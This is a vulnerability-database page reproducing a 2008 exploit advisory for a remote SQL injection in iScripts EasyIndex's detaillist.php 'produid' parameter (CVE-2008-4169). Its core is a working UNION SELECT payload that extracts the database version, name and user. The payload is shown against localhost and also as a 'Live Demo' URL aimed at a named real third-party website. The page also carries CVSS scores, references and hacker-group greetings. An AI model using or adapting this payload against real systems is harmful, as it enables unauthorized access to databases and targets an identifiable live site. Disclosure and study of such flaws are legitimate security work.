Bug: iScripts EasyIndex (produid) Remote SQL Injection Vulnerability ( Ascii Version )

Search:
WLB2

iScripts EasyIndex (produid) Remote SQL Injection Vulnerability

Published
Credit
Risk
2008.09.23
SirGod
High
CWE
CVE
Local
Remote
CWE-89
CVE-2008-4169
No
Yes

CVSS Base Score
Impact Subscore
Exploitability Subscore
7.5/10
6.4/10
10/10
Exploit range
Attack complexity
Authentication
Remote
Low
No required
Confidentiality impact
Integrity impact
Availability impact
Partial
Partial
Partial

########################################################################################################################
#
[+] iScripts EasyIndex (produid) Remote SQL Injection
[+] Discovered By SirGod
[+] wWw.MorTal-TeaM.OrG
[+] Greetz : E.M.I.N.E.M,Ras,Puscas_marin,ToxicBlood,HrN,kemrayz,007m,Raven,Nytr0gen,str0ke
########################################################################################################################

[+] Remote SQL Injection


PoC :

http://[target]/[path]/detaillist.php?produid=[SQL]


Example :

http://127.0.0.1/iscripts/detaillist.php?produid=-1 union all
select 1,2,3,4,version(),database(),user(),8,9,10,11,12,13,14--


Live Demo :

http://www.dawsonvalley.net/business/detaillist.php?produid=-1
union all select
1,2,3,4,version(),database(),user(),8,9,10,11,12,13,14--


- Note : the number of colums can vary.


########################################################################################################################
##

References:

http://xforce.iss.net/xforce/xfdb/45160
http://www.securityfocus.com/bid/31202
http://www.milw0rm.com/exploits/6467

See this note in TXT Version

Bugtraq RSS
Bugtraq
 
REDDIT
REDDIT
 
DIGG
DIGG
 
LinkedIn
LinkedIn
 
CVE RSS
CVEMAP

Copyright 2014, cxsecurity.com
Ascii Version